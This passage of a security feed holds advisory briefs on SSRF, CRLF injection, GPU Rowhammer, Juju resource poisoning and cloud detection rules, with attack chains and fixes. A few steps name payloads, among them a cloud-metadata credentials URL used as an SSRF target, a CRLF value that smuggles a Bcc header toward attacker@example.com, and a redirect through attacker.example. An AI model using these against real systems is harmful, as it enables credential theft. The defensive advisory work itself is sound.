]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>openobserve</category><category>cloud</category><category>vulnerability</category></item><item><title>text-generation-webui SSRF Vulnerability (CVE-2026-35486)</title><link>https://feed.craftedsignal.io/briefs/2026-04-text-generation-webui-ssrf/</link><pubDate>Tue, 07 Apr 2026 16:16:26 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-text-generation-webui-ssrf/</guid><description>The text-generation-webui application before version 4.3 is vulnerable to server-side request forgery (SSRF) due to insufficient validation of user-supplied URLs by the superbooga and superboogav2 RAG extensions, potentially leading to credential theft and internal network reconnaissance.</description><content:encoded><![CDATA[<p>The text-generation-webui application is an open-source web interface for running Large Language Models (LLMs). Prior to version 4.3, the superbooga and superboogav2 RAG (Retrieval-Augmented Generation) extensions are susceptible to a Server-Side Request Forgery (SSRF) vulnerability. These extensions fetch user-provided URLs using the <code>requests.get()</code> function without proper validation. Specifically, there are no checks for URL schemes (e.g., <code>file://</code>, <code>gopher://</code>), IP address filtering, or hostname whitelisting. This lack of validation allows a malicious actor to craft URLs that target internal resources, cloud metadata endpoints (e.g., AWS, Azure, GCP), and other sensitive services. Successful exploitation can lead to the exfiltration of sensitive data, including IAM credentials, and allow an attacker to probe internal network infrastructure. Version 4.3 of text-generation-webui addresses this vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies an instance of text-generation-webui running a vulnerable version (prior to 4.3) with the superbooga or superboogav2 RAG extension enabled.</li>
<li>The attacker crafts a malicious URL targeting a cloud metadata endpoint (e.g., <code>http://169.254.169.254/latest/meta-data/iam/security-credentials/</code>).</li>
<li>The attacker injects the malicious URL into a text-generation-webui RAG extension user input field.</li>
<li>The application, using the <code>requests.get()</code> function, fetches the content from the attacker-controlled URL without validation.</li>
<li>The cloud metadata, containing potentially sensitive information like temporary IAM credentials, is retrieved by the application.</li>
<li>The retrieved data is processed through the RAG pipeline.</li>
<li>The attacker leverages the RAG pipeline to extract the content from the application.</li>
<li>The attacker uses the exfiltrated credentials to access and compromise other resources within the victim&rsquo;s cloud environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-35486 can have significant consequences. An attacker can potentially gain unauthorized access to cloud resources by stealing IAM credentials. This could lead to data breaches, service disruption, and financial loss. The vulnerability affects any text-generation-webui instance running a version prior to 4.3 with the vulnerable RAG extensions enabled, impacting individuals and organizations utilizing this software for LLM-based applications.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade text-generation-webui to version 4.3 or later to remediate the SSRF vulnerability (CVE-2026-35486).</li>
<li>Deploy the Sigma rule &ldquo;Detect text-generation-webui SSRF Attempt&rdquo; to your SIEM to detect exploitation attempts targeting cloud metadata endpoints.</li>
<li>Monitor web server logs for outbound connections to internal IP addresses (e.g., 169.254.169.254) originating from the text-generation-webui application.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>text-generation-webui</category><category>cve-2026-35486</category><category>cloud</category></item><item><title>GPUBreach: GPU Rowhammer Attack for Privilege Escalation</title><link>https://feed.craftedsignal.io/briefs/2026-04-gpubreach-rowhammer/</link><pubDate>Tue, 07 Apr 2026 11:31:38 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-gpubreach-rowhammer/</guid><description>GPUBreach is a novel Rowhammer attack targeting GPUs, allowing privilege escalation to root shell by inducing bit flips in GDDR6 memory and exploiting memory-safety bugs in Nvidia drivers, posing a significant risk to shared cloud environments.</description><content:encoded><![CDATA[<p>A team of researchers from the University of Toronto has discovered a new Rowhammer attack named GPUBreach, which exploits GDDR6 memory in Nvidia GPUs. This attack induces bit flips that corrupt GPU page tables. In combination with existing memory-safety bugs in Nvidia drivers, GPUBreach enables arbitrary read-write access to memory. This ultimately leads to CPU-side privilege escalation, resulting in a root shell and full system compromise. This poses a significant threat to cloud environments, where multiple users share the same physical GPU. The researchers reported their findings to Nvidia in November 2025. Google awarded a $600 bounty for the vulnerability discovery.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains code execution privileges on a GPU within a shared environment (e.g., cloud).</li>
<li>Attacker utilizes the GPUBreach technique to repeatedly access (&ldquo;hammer&rdquo;) a specific row of GDDR6 memory cells on the GPU.</li>
<li>This &ldquo;hammering&rdquo; generates electrical interference, causing bit flips in neighboring memory regions.</li>
<li>The induced bit flips corrupt GPU page tables, granting arbitrary read-write access to memory.</li>
<li>Attacker exploits memory-safety bugs in Nvidia drivers.</li>
<li>This leads to CPU-side privilege escalation by exploiting the corrupted memory access.</li>
<li>Attacker gains root shell privileges on the compromised system.</li>
<li>Attacker achieves full system compromise, potentially leading to unauthorized data access, data corruption, or breaches of memory isolation.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The GPUBreach attack allows for privilege escalation from a user with GPU access to root on a shared system. This compromises the confidentiality, integrity, and availability of the entire system, especially in cloud environments where multiple users share physical GPUs. Successful exploitation can lead to unauthorized data access, data corruption, breaches of memory isolation, and potentially complete control over the compromised system. Google awarded a $600 bounty highlighting the significance of this vulnerability.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable ECC on server and workstation GPUs (e.g., RTX A6000) as per the Nvidia security notice to mitigate single-bit flips, although this is not a foolproof mitigation as the attack can induce more than two bit flips.</li>
<li>Monitor GPU resource usage for unusual memory access patterns indicative of Rowhammer attacks using the detection rule for <code>GPU Memory Hammering Detection</code>.</li>
<li>Monitor for suspicious processes utilizing the GPU in conjunction with privilege escalation attempts as detected by the <code>Suspicious GPU Privilege Escalation</code> Sigma rule.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>rowhammer</category><category>privilege-escalation</category><category>gpu</category><category>cloud</category></item><item><title>Plunk Email Platform CRLF Header Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-30-plunk-crlf/</link><pubDate>Mon, 06 Apr 2026 17:17:11 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-30-plunk-crlf/</guid><description>A CRLF header injection vulnerability in Plunk versions prior to 0.8.0 allows authenticated API users to inject arbitrary email headers, enabling silent email forwarding, reply redirection, or sender spoofing.</description><content:encoded><![CDATA[<p>Plunk, an open-source email platform built on top of AWS SES, is vulnerable to CRLF header injection. Prior to version 0.8.0, the application failed to properly sanitize user-supplied values for fields like <code>from.name</code>, <code>subject</code>, custom header keys/values, and attachment filenames. This vulnerability, identified as CVE-2026-34975, allows an authenticated API user to inject arbitrary email headers by including carriage return (<code>\r</code>) and line feed (<code>\n</code>) characters in these fields. Successful exploitation could lead to silent email forwarding to unauthorized recipients, redirection of replies to attacker-controlled addresses, and spoofing of the sender&rsquo;s identity. The vulnerability was addressed in Plunk version 0.8.0 by implementing input validation to reject any of the affected fields containing <code>\r</code> or <code>\n</code> characters. Defenders should ensure Plunk installations are upgraded to version 0.8.0 or later.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains authenticated access to the Plunk API.</li>
<li>The attacker crafts a malicious API request to send an email.</li>
<li>In the <code>from.name</code>, <code>subject</code>, custom header keys/values, or attachment filename fields, the attacker injects carriage return (<code>\r</code>) and line feed (<code>\n</code>) characters followed by arbitrary email headers. For example: <code>Subject: legitimate subject\r\nBcc: attacker@example.com</code>.</li>
<li>The Plunk application, prior to version 0.8.0, processes the request without proper sanitization. The injected CRLF sequences are interpreted as header delimiters, and the attacker-supplied headers are added to the email.</li>
<li>The Plunk application constructs a raw MIME message including the injected headers.</li>
<li>Plunk sends the email via AWS SES.</li>
<li>The recipient receives the email, which now includes the attacker-injected headers (e.g., <code>Bcc</code>, <code>Reply-To</code>).</li>
<li>The attacker achieves their objective, such as silently receiving a copy of the email (Bcc), redirecting replies to an attacker-controlled address (Reply-To), or impersonating another sender (From).</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of the CRLF injection vulnerability (CVE-2026-34975) in Plunk can lead to significant confidentiality and integrity breaches. Attackers can silently intercept sensitive email communications by adding themselves as Bcc recipients. They can also redirect replies to attacker-controlled addresses, potentially gaining access to further information. Furthermore, attackers can spoof the sender&rsquo;s identity, enabling them to conduct phishing attacks or distribute malicious content under the guise of a trusted source. The number of potential victims is proportional to the number of Plunk users and the sensitivity of the information they handle. The risk is particularly high for organizations using Plunk to manage critical communications or sensitive data.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Plunk to version 0.8.0 or later to remediate CVE-2026-34975, which introduces input validation to prevent CRLF injection.</li>
<li>Monitor Plunk application logs for suspicious API requests containing carriage return (<code>\r</code>) or line feed (<code>\n</code>) characters in email fields. Implement a rule to detect these characters in <code>cs-uri-query</code> within the webserver logs.</li>
<li>Implement input validation on any custom email sending functionality to prevent CRLF injection vulnerabilities.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>crlf</category><category>header-injection</category><category>plunk</category><category>cve-2026-34975</category><category>cloud</category></item><item><title>AWS IAM Long-Term Access Key Correlated with Elevated Detection Alerts</title><link>https://feed.craftedsignal.io/briefs/2026-06-aws-iam-access-key-correlation/</link><pubDate>Mon, 06 Apr 2026 14:37:37 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-06-aws-iam-access-key-correlation/</guid><description>This rule correlates AWS Long-Term Access Key First Seen from Source IP alerts with other open alerts of medium or higher severity that share the same IAM access key ID to prioritize investigation of potentially compromised accounts, helping identify post-compromise activity.</description><content:encoded><![CDATA[<p>This detection rule, published by Elastic, is designed to correlate AWS security alerts and prioritize investigations related to potentially compromised IAM access keys. Specifically, it focuses on scenarios where a long-term IAM access key is observed originating from a new source IP address (detected by the &ldquo;AWS Long-Term Access Key First Seen from Source IP&rdquo; rule, rule ID 9f8e3c5e-f72e-4e91-93f6-e98a4fae3e4f) and is also associated with other open alerts of medium, high, or critical severity. This correlation aims to surface instances where a newly exposed or compromised access key is actively being used for malicious activities, enabling security teams to respond more effectively to potential credential access incidents and initial access attempts. The rule is a higher-order rule that analyzes existing security alerts within an Elastic Security deployment and leverages the <code>kibana.alert</code> fields to identify related events.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains access to a valid AWS IAM Long-Term Access Key. This could be through phishing, credential stuffing, or exposed credentials in source code.</li>
<li>The attacker uses the compromised access key to interact with AWS services from a new and previously unseen IP address. This triggers the &ldquo;AWS Long-Term Access Key First Seen from Source IP&rdquo; rule (rule ID: 9f8e3c5e-f72e-4e91-93f6-e98a4fae3e4f).</li>
<li>The attacker leverages the compromised credentials to perform reconnaissance activities within the AWS environment, such as listing resources or querying IAM configurations.</li>
<li>The attacker attempts to escalate privileges by exploiting misconfigurations or vulnerabilities in IAM policies.</li>
<li>The attacker performs actions indicating lateral movement within the AWS environment, such as accessing or modifying resources in different AWS accounts.</li>
<li>The attacker compromises additional AWS resources or services, such as EC2 instances or S3 buckets. These activities trigger medium, high, or critical severity alerts.</li>
<li>The correlation rule identifies the co-occurrence of the &ldquo;AWS Long-Term Access Key First Seen from Source IP&rdquo; alert and other elevated severity alerts associated with the same access key ID.</li>
<li>The security team investigates the correlated alerts and takes appropriate remediation steps, such as rotating the compromised access key and reviewing IAM policies.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack leveraging compromised AWS IAM credentials can lead to significant data breaches, service disruption, and financial losses. Attackers can gain unauthorized access to sensitive data stored in S3 buckets, compromise EC2 instances, and disrupt critical AWS services. The correlation rule aims to reduce the dwell time of attackers by prioritizing the investigation of compromised credentials associated with ongoing malicious activity. This can prevent attackers from further escalating their attacks and minimizing the overall impact of the breach. Failure to detect and respond to these attacks can result in regulatory fines, reputational damage, and loss of customer trust.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the &ldquo;AWS IAM Long-Term Access Key Correlated with Elevated Detection Alerts&rdquo; rule (rule ID 98cfaa44-83f0-4aba-90c4-363fb9d51a75) in your Elastic Security environment to identify potentially compromised IAM access keys.</li>
<li>Investigate alerts triggered by the rule by pivoting on the <code>aws.cloudtrail.user_identity.access_key_id</code> in CloudTrail and IAM to understand the context of the access key usage.</li>
<li>Review the sibling alerts identified by the rule using <code>Esql.kibana_alert_rule_name_values</code> and <code>Esql.kibana_alert_rule_id_values</code> to understand the scope and impact of the potential compromise.</li>
<li>Configure your Elastic Security deployment to properly map risk scores to severity levels, ensuring that <code>kibana.alert.risk_score &gt;= 47</code> corresponds to medium or higher severity alerts.</li>
<li>Rotate or disable any IAM access keys identified as compromised by the rule to prevent further unauthorized access.</li>
<li>Enable AWS CloudTrail logging to capture detailed information about API calls made within your AWS environment, providing valuable context for investigating security alerts.</li>
<li>Implement the &ldquo;AWS Long-Term Access Key First Seen from Source IP&rdquo; rule (rule_id: 9f8e3c5e-f72e-4e91-93f6-e98a4fae3e4f) if not already enabled, as it is a pre-requisite for this correlation rule.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>iam</category><category>credential-access</category><category>initial-access</category></item><item><title>Kubernetes Secret Access via Unusual User Agent</title><link>https://feed.craftedsignal.io/briefs/2024-01-09-kubernetes-secret-access/</link><pubDate>Mon, 06 Apr 2026 12:05:33 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-09-kubernetes-secret-access/</guid><description>Detects unusual access to Kubernetes secrets, potentially indicating an attacker attempting to steal sensitive information after gaining initial access to the cluster.</description><content:encoded><![CDATA[<p>This detection rule identifies instances where Kubernetes secrets are accessed through atypical means, specifically flagging requests originating from unusual user agents, usernames, or source IPs. The underlying assumption is that after compromising a pod or stealing a kubeconfig file, adversaries often attempt to harvest sensitive information stored as secrets within the Kubernetes cluster. This includes service account tokens, registry credentials, cloud keys, and other critical data. This activity can lead to privilege escalation and lateral movement within the cluster or the wider cloud environment. The rule focuses on identifying deviations from established access patterns to Kubernetes secrets to detect potentially malicious activity. The rule leverages data from kubernetes.audit_logs.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Compromise:</strong> An attacker gains initial access to the Kubernetes cluster, potentially by exploiting a vulnerability in a pod or by stealing a kubeconfig file.</li>
<li><strong>Discovery:</strong> The attacker enumerates available resources within the cluster to identify potential targets, including secrets. This might involve using <code>kubectl get secrets --all-namespaces</code>.</li>
<li><strong>Credential Theft:</strong> The attacker attempts to access Kubernetes secrets using an unusual user agent, source IP, or user name. For example, using <code>curl</code> from a compromised pod to access the Kubernetes API.</li>
<li><strong>Data Exfiltration:</strong> The attacker retrieves the contents of the secrets. Secrets might contain service account tokens, registry credentials, cloud IAM keys, database passwords, etc.</li>
<li><strong>Lateral Movement:</strong> With stolen credentials, the attacker attempts to move laterally within the cluster or the connected cloud environment. They might use the credentials to access other pods, services, or cloud resources.</li>
<li><strong>Privilege Escalation:</strong> The attacker uses the stolen credentials to escalate their privileges within the Kubernetes cluster or the cloud environment. For example, creating new roles or role bindings.</li>
<li><strong>Persistence:</strong> The attacker establishes persistence by creating backdoors or modifying existing deployments. This might involve creating new pods or modifying existing deployments.</li>
<li><strong>Impact:</strong> The attacker achieves their objective, such as data theft, denial of service, or infrastructure compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to the compromise of sensitive data stored within Kubernetes secrets. This could include database credentials, API keys, and service account tokens. The impact can range from unauthorized access to sensitive data, to complete compromise of the Kubernetes cluster and the connected cloud environment. This can affect any organization using Kubernetes to manage their applications, potentially leading to data breaches, service disruptions, and financial losses. The severity depends on the sensitivity of the data stored in the compromised secrets and the level of access the attacker gains.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Kubernetes Secret Access via Unusual User Agent</code> to your SIEM and tune for your environment to detect unusual access patterns to Kubernetes secrets.</li>
<li>Investigate and validate any alerts generated by the deployed Sigma rule, focusing on the requesting identity, source IP, and user agent to confirm whether they align with approved access records.</li>
<li>Implement RBAC least privilege to limit access to secrets to only the required service accounts and users to minimize the potential impact of credential theft.</li>
<li>Monitor Kubernetes audit logs (<code>logs-kubernetes.audit_logs-*</code>) for suspicious activity, including unusual API calls and access patterns to sensitive resources.</li>
<li>Regularly rotate secrets and credentials to minimize the window of opportunity for attackers to use stolen credentials.</li>
</ul>
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>kubernetes</category><category>credential-access</category><category>cloud</category></item><item><title>Juju Resource Poisoning Vulnerability Allows Unauthorized Resource Modification</title><link>https://feed.craftedsignal.io/briefs/2026-04-juju-resource-poisoning/</link><pubDate>Sat, 04 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-juju-resource-poisoning/</guid><description>An authenticated user, machine, or controller within a Juju controller can modify application resources due to a lack of authorization checks, potentially leading to resource poisoning and privilege escalation by uploading malicious resources.</description><content:encoded><![CDATA[<p>A resource poisoning vulnerability exists within Juju, a cloud orchestration tool. Any authenticated user, machine, or controller operating under a Juju controller can exploit this vulnerability to modify the resources of an application within the entire controller. The vulnerability stems from insufficient authorization checks in the resource handler, allowing unauthorized PUT and GET requests. A compromised workload with machine credentials can modify OCI resources for other models in the controller, such as replacing a legitimate Docker image with a trojan horse version. This vulnerability affects Juju versions prior to the fix in commit 26ff93c903d5, specifically in the go/github.com/juju/juju package. This can have significant consequences, including privilege escalation and unauthorized access to sensitive information.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a Juju controller as an authenticated user, machine, or controller. This could be via compromised credentials or a vulnerable workload already within the Juju environment.</li>
<li>The attacker identifies the target model UUID, application name, and resource name they wish to poison. This information can be obtained through enumeration within the Juju environment or by leveraging publicly available charm information from Charmhub.</li>
<li>The attacker crafts a malicious resource, such as a trojan horse Docker image, that has the same file extension as the original resource.</li>
<li>The attacker sends a PUT request to the resource handler endpoint <code>/:modeluuid/applications/:application/resources/:resources</code> with the malicious resource.</li>
<li>The Juju controller&rsquo;s resource handler, lacking proper authorization checks, accepts the malicious resource and overwrites the existing resource in its cache.</li>
<li>When the target application attempts to retrieve the resource, it receives the poisoned version from the controller&rsquo;s cache.</li>
<li>The poisoned resource is executed or deployed within the target application&rsquo;s environment, leading to compromise. In the case of a Docker image, this could lead to root access on the underlying system.</li>
<li>The attacker leverages the compromised application (e.g., a Kubernetes vault) to access sensitive information, such as vault secrets, and further expand their access within the environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This vulnerability allows an attacker to inject security vulnerabilities into other workloads managed by Juju. This can lead to privilege escalation, data breaches, and complete compromise of the Juju-managed environment. The most obvious impact is on deployments using OCI containers, where a malicious Docker image can grant an attacker execution escalation. In a Kubernetes environment managing vault secrets, an attacker could potentially gain root access to all vault secrets, seriously impacting the confidentiality and integrity of the data stored within. The specific impact depends on the type of resource poisoned and its role in the target application, but could be severe.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Juju to a version containing the fix for CVE-2025-68153 to address the underlying vulnerability.</li>
<li>Implement additional authorization checks and access controls within the Juju environment to restrict resource modification to authorized users and processes.</li>
<li>Enable and review Juju API server logs (category: webserver, product: linux) for suspicious PUT requests to resource handler endpoints, looking for unexpected resource modifications.</li>
<li>Deploy the Sigma rule &ldquo;Detect Unauthorized Juju Resource Modification&rdquo; to your SIEM to detect unauthorized PUT requests to Juju resource endpoints.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>juju</category><category>resource-poisoning</category><category>privilege-escalation</category><category>cloud</category></item><item><title>curl_cffi SSRF Vulnerability via Redirects</title><link>https://feed.craftedsignal.io/briefs/2026-04-curl-cffi-ssrf/</link><pubDate>Fri, 03 Apr 2026 21:36:44 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-curl-cffi-ssrf/</guid><description>curl_cffi versions before 0.15.0 are vulnerable to server-side request forgery (SSRF) due to unrestricted redirects to internal IP ranges, potentially enabling access to sensitive internal resources and cloud metadata.</description><content:encoded><![CDATA[<p>The curl_cffi library, a Python binding for libcurl, is susceptible to a server-side request forgery (SSRF) vulnerability in versions prior to 0.15.0. This flaw stems from the library&rsquo;s unrestricted handling of redirects, allowing attacker-controlled URLs to redirect requests to internal IP ranges and services. An attacker can exploit this behavior to access sensitive information such as cloud metadata or bypass network controls. The vulnerability is triggered because curl_cffi automatically follows redirects (CURLOPT_FOLLOWLOCATION = 1) without validating the destination. Additionally, the TLS impersonation feature in curl_cffi can further obscure malicious requests by mimicking legitimate browser traffic, potentially bypassing TLS-based filtering mechanisms. This issue is similar to other redirect-based SSRF vulnerabilities, like CVE-2025-68616.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a curl_cffi application vulnerable to SSRF.</li>
<li>The attacker crafts a malicious URL pointing to an attacker-controlled server (attacker.example).</li>
<li>The victim application uses curl_cffi to request the attacker-controlled URL.</li>
<li>The attacker&rsquo;s server responds with an HTTP 302 redirect to an internal IP address (e.g., 169.254.169.254, the cloud metadata endpoint).</li>
<li>curl_cffi automatically follows the redirect without validation.</li>
<li>The request is sent to the internal IP address, bypassing external access controls.</li>
<li>The internal service (e.g., cloud metadata API) responds with sensitive information.</li>
<li>The attacker retrieves the sensitive information from the victim application&rsquo;s logs or response data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to access internal network services and sensitive cloud metadata. This can lead to the exposure of API keys, credentials, and other confidential information. The impact can range from unauthorized access to internal applications and data to potential compromise of cloud infrastructure. All applications using curl_cffi versions before 0.15.0 are vulnerable. The severity is high due to the potential for significant data breaches and infrastructure compromise.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to curl_cffi version 0.15.0 or later to patch CVE-2026-33752.</li>
<li>Implement server-side input validation to prevent passing attacker-controlled URLs to curl_cffi.</li>
<li>Monitor network traffic for connections to internal IP ranges (127.0.0.1, 169.254.0.0/16) originating from processes using curl_cffi.  Create a network_connection rule to detect this activity.</li>
<li>Inspect web server logs for HTTP 302 redirects to internal IP addresses, which could indicate SSRF attempts. Deploy a webserver rule to detect this.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>curl_cffi</category><category>cloud</category></item><item><title>Unusual City for Azure Activity Logs Event</title><link>https://feed.craftedsignal.io/briefs/2026-06-unusual-azure-city/</link><pubDate>Thu, 02 Apr 2026 13:35:13 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-06-unusual-azure-city/</guid><description>A machine learning job detected Azure Activity Logs activity that, while not inherently suspicious or abnormal, is sourcing from a geolocation (city) that is unusual for the event action, indicating potential compromised credentials.</description><content:encoded><![CDATA[<p>This detection identifies Azure Activity Logs activity originating from a city that is atypical for the specific event action being performed. The underlying mechanism is a machine learning job, <code>azure_activitylogs_rare_event_action_for_a_city_ea</code>, designed to surface anomalous geolocation patterns. The rule is triggered when the anomaly score exceeds 50. Such deviations can indicate compromised credentials used by an attacker operating from a different geography than the authorized user. This activity can be an early indicator of account abuse, potentially preceding broader impact such as data exfiltration or resource exploitation. The rule is designed to be used with Elastic Stack version 9.4.0 and later.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Credential Compromise:</strong> An attacker obtains valid Azure credentials (username/password or service principal keys) through phishing, credential stuffing, or other means.</li>
<li><strong>Initial Access:</strong> The attacker uses the compromised credentials to log in to the Azure environment from an unusual geographic location (city).</li>
<li><strong>Activity Log Generation:</strong> The login and subsequent actions generate Azure Activity Logs entries.</li>
<li><strong>Resource Access/Modification:</strong> The attacker performs actions such as adding privileged role assignments, creating virtual machines, modifying network configurations, or accessing Key Vault secrets.</li>
<li><strong>Lateral Movement (Potential):</strong> The attacker may use the initially compromised account to discover and access other resources or accounts within the Azure environment.</li>
<li><strong>Data Exfiltration/Resource Exploitation (Potential):</strong> The attacker exfiltrates sensitive data or uses compromised resources for malicious purposes like cryptocurrency mining.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack can lead to unauthorized access to sensitive data, modification of critical infrastructure, and deployment of malicious resources within the Azure environment. The impact can range from data breaches and financial losses to disruption of services. While the risk score of this detection is low, further investigation is required to determine the extent and nature of the malicious activity.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable the associated Machine Learning job (<code>azure_activitylogs_rare_event_action_for_a_city_ea</code>) and ensure that the Azure Activity Logs integration is properly configured to provide the necessary data.</li>
<li>Review the investigation guide within the rule&rsquo;s <code>note</code> field to understand possible investigation steps, including validating user presence in the region and enriching the source IP.</li>
<li>Implement response and remediation steps outlined in the rule <code>note</code> field such as revoking active sessions, resetting passwords, and reverting changes executed from the unusual city.</li>
<li>Configure Conditional Access policies with country allowlists and named egress IP ranges, as recommended in the rule&rsquo;s <code>note</code> field, to prevent logins from unexpected locations.</li>
</ul>
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>azure</category><category>cloud</category><category>anomaly-detection</category></item><item><title>PraisonAI SSRF Vulnerability via Unvalidated api_base Parameter</title><link>https://feed.craftedsignal.io/briefs/2026-04-praisonai-ssrf/</link><pubDate>Wed, 01 Apr 2026 23:22:44 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-praisonai-ssrf/</guid><description>PraisonAI versions 4.5.89 and earlier are vulnerable to SSRF via the `api_base` parameter in the `passthrough()` function, allowing attackers to make requests to internal services or external hosts, potentially leading to IAM credential theft on cloud infrastructure or access to internal services within the VPC.</description><content:encoded><![CDATA[<p>PraisonAI versions 4.5.89 and earlier are vulnerable to a Server-Side Request Forgery (SSRF) vulnerability (CVE-2026-34936) due to insufficient validation of the <code>api_base</code> parameter within the <code>passthrough()</code> function. This flaw allows an attacker to control the base URL used in HTTP requests, enabling them to target internal services, external hosts, or cloud metadata endpoints. The vulnerability arises because the <code>api_base</code> parameter is directly concatenated with the <code>endpoint</code> parameter and passed to <code>httpx.Client.request()</code> without any sanitization. This is triggered in the <code>passthrough()</code> function if the <code>litellm</code> primary path raises an <code>AttributeError</code>. This allows attackers to bypass intended access controls and potentially retrieve sensitive information or trigger unintended actions within the PraisonAI server&rsquo;s network. The vulnerability was reported on April 1, 2026.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a PraisonAI instance running a vulnerable version (&lt;= 4.5.89).</li>
<li>The attacker crafts a malicious request to the <code>passthrough()</code> function, providing a crafted <code>api_base</code> parameter.</li>
<li>The crafted <code>api_base</code> contains the address of an internal service (e.g., Redis, Elasticsearch, Kubernetes API) or the EC2 metadata service (<code>http://169.254.169.254</code>).</li>
<li>An <code>AttributeError</code> is triggered in the <code>litellm</code> primary path.</li>
<li>The <code>passthrough()</code> function, within <code>passthrough.py</code>, concatenates the attacker-controlled <code>api_base</code> with the specified <code>endpoint</code>.</li>
<li>The resulting URL is then passed to <code>httpx.Client.request()</code>, making an HTTP request to the attacker-specified destination.</li>
<li>If targeting the EC2 metadata service, the attacker can retrieve IAM credentials associated with the instance.</li>
<li>If targeting internal services, the attacker can potentially access sensitive data or perform unauthorized actions, due to the default <code>AUTH_ENABLED = False</code> setting.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability can lead to serious consequences. On cloud infrastructure, attackers can steal IAM credentials from the EC2 metadata service (IMDSv1), potentially gaining control over the entire AWS account. Internal services within the VPC, such as Redis, Elasticsearch, and Kubernetes API, become accessible without authentication, as the Flask API server deploys with <code>AUTH_ENABLED = False</code> by default. This can lead to data breaches, service disruptions, or further lateral movement within the internal network. This vulnerability affects deployments of PraisonAI version 4.5.89 and earlier.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade PraisonAI to a version greater than 4.5.89 to patch CVE-2026-34936.</li>
<li>Implement input validation and sanitization on the <code>api_base</code> parameter within the <code>passthrough()</code> function to prevent SSRF attacks.</li>
<li>If running on AWS, disable IMDSv1 and migrate to IMDSv2 to mitigate the risk of IAM credential theft.</li>
<li>Implement network segmentation and access controls to restrict access to internal services from the PraisonAI server.</li>
<li>Deploy the following Sigma rule to detect attempts to exploit the SSRF vulnerability by monitoring for connections to the EC2 metadata service or the local loopback address.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>praisonai</category><category>cloud</category></item><item><title>KubeAI OS Command Injection via Model URL in Ollama Engine Startup Probe</title><link>https://feed.craftedsignal.io/briefs/2026-04-kubeai-command-injection/</link><pubDate>Wed, 01 Apr 2026 23:22:43 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-kubeai-command-injection/</guid><description>The KubeAI project is vulnerable to OS command injection because the `ollamaStartupProbeScript()` function constructs a shell command string using `fmt.Sprintf` with unsanitized model URL components (`ref`, `modelParam`), which is then executed via `bash -c` as a Kubernetes startup probe, allowing arbitrary command execution inside model server pods by attackers with the ability to create or update `Model` custom resources.</description><content:encoded><![CDATA[<p>KubeAI versions 0.23.1 and earlier are vulnerable to an OS command injection flaw in the Ollama engine&rsquo;s startup probe. The vulnerability stems from the <code>ollamaStartupProbeScript()</code> function, which constructs a shell command using <code>fmt.Sprintf</code> with unsanitized model URL components (<code>ref</code> and 